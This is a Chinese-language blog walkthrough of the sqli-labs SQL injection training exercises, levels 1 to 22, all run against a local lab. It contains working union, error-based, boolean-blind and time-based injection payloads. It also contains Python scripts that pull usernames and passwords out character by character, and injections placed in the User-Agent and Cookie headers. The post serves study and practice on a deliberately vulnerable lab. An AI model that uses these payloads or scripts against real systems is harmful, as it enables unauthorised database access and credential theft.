lockcy's cave
0%

sqli-labs解题记录

发表于 更新于
本文字数: 4.9k 阅读时长 ≈ 4 分钟

最近有在整理技能树,顺便整理一下以前学习的知识点,先从sql注入开始

sqli-labs是一个github上的sql注入练手项目,很基础,适合新手练习,最近在整理知识点,所以刷一下就当巩固知识点

第一部分(简单)
Less1

最基础的union 联合注入
爆字段数目
http://localhost/sqli-labs/Less-1/?id=-1' order by 3%23
爆数据库
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,database()%20%23
爆表名(因为这里有limit的限制,所以用group_concat)
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22%23
爆字段名
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22users%22%23
爆数据
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20users%23

Less2
id为数字,不需要闭合,不加单引号即可

Less3
id需要用单引号和右括号闭合

Less4
id需要用双引号和右括号闭合

Less5
与前面相同,但当sql语句正确时仅会回显you are in…
基于报错的盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @auther : lockcy
import requests
url = 'http://localhost/sqli-labs/Less-5/?id=1\''
r = requests.Session()
result = ''
for i in range(1,10):
for j in range(37,128):
#用户名
        #payload=" and ord(mid(user(),{0},1))={1}%23".format(str(i),str(j))
#数据库
        #payload = " and ord(mid(database(),{0},1))={1}%23".format(str(i), str(j))
#表名
        #payload = " and ord(mid((select table_name from information_schema.tables where table_schema=\'security\' limit 0,1),{0},1))={1}%23".format(str(i),str(j))
#列名
        #payload = " and ord(mid((select column_name from information_schema.columns where table_name=\'users\' limit 0,1),{0},1))={1}%23".format(str(i),str(j))
#数据名
        payload = " and ord(mid((select group_concat(username,0x3a,password) from users limit 0,1),{0},1))={1}%23".format(str(i),str(j))
        payload=url+payload
        print (payload)
        html = r.get(payload)
        if "You are in" in html.text:
            result += chr(j)
            print (result)
            break
print (result)

Less6
与5基本相同,不需要单引号闭合

Less7
与5基本相同,单引号加两个右括号闭合

Less8
与5基本相同,只是错误没有回显,用less5的判断依然有效

Less9
无论sql语句是否正确,回显都一样,可以用mysql里和时间有关的函数来延时注入(sleep、benchmark)
Less5的脚本稍微改一下就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @auther : lockcy
import requests
import time
url = 'http://localhost/sqli-labs/Less-9/?id=1\''
r = requests.Session()
result = ''
for i in range(1,10):
    for j in range(37,128):
        time1=time.time()
        payload=" and ord(mid(user(),{0},1))={1} and sleep(3)%23".format(str(i),str(j))
        #payload = " and ord(mid(database(),{0},1))={1} and sleep(3)%23 ".format(str(i), str(j))
        #payload = " and ord(mid((select table_name from information_schema.tables where table_schema=\'security\' limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i),str(j))
        #payload = " and ord(mid((
        # select column_name from information_schema.columns where table_name=\'users\' limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i),str(j))
        #payload = " and ord(mid((select group_concat(username,0x3a,password) from users limit 0,1),{0},1))={1} and sleep(3)%23".format(str(i),str(j))
        payload=url+payload
        print (payload)
        html = r.get(payload,timeout=5)
        time2=time.time()
        if time2-time1>3:
            result += chr(j)
            print (result)
            break
print (result)

Less10
一样就不赘述了,下面同一类型也就带过了。

Less11 Less12 less13 less14
在post的登录框里注入,原理还是一样的,这里以less11为例

Less 15 lesss16
没有了回显,基于时间的盲注,脚本就把less9里改成post就可以了

Less17

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @auther : lockcy
import requests
import time
url = 'http://localhost/sqli-labs/Less-17/'
r = requests.Session()
result = ''
for i in range(1,10):
    for j in range(110,128):
        time1=time.time()
        payload='1\' where username=\'admin\' and if(ascii(substr(user(),{0},1))={1},sleep(4),1)%23'.format(str(i),str(j))
        print (payload)
        data={'username':'admin','password':payload}
        html = r.post(url=url,data=data,timeout=20)
        time2=time.time()
        if time2-time1>3:
            result += chr(j)
            print (result)
            break
print (result)

Less18
Password 和username都有过滤,没法注入,又insert了ip agent,所以考虑在user-agent头报错注入
User-agent : 1’ or updatexml(1,concat(‘#’,(database())),0),’,’)#

Less19
和less18类似,不过是在Referer里注入,但这里要注意post的username和password数据库里一定要存在,否则不会回显错误信息

Less20
cookies注入,注入点在$sql=”SELECT * FROM users WHERE username=’$cookee’ LIMIT 0,1”;
成功登陆后修改cookies
Cookie: uname=admin’ and extractvalue(1,concat(0x3a,(select database()),0x3a))#;

注意这里仍然要使用报错注入,因为只有admin登陆过且cookies存在的情况下才能成功注入

Less21
和上题一样,只是闭合多加了右括号且需base64加密

Less22
和20一样,只是闭合为双引号且需base64加密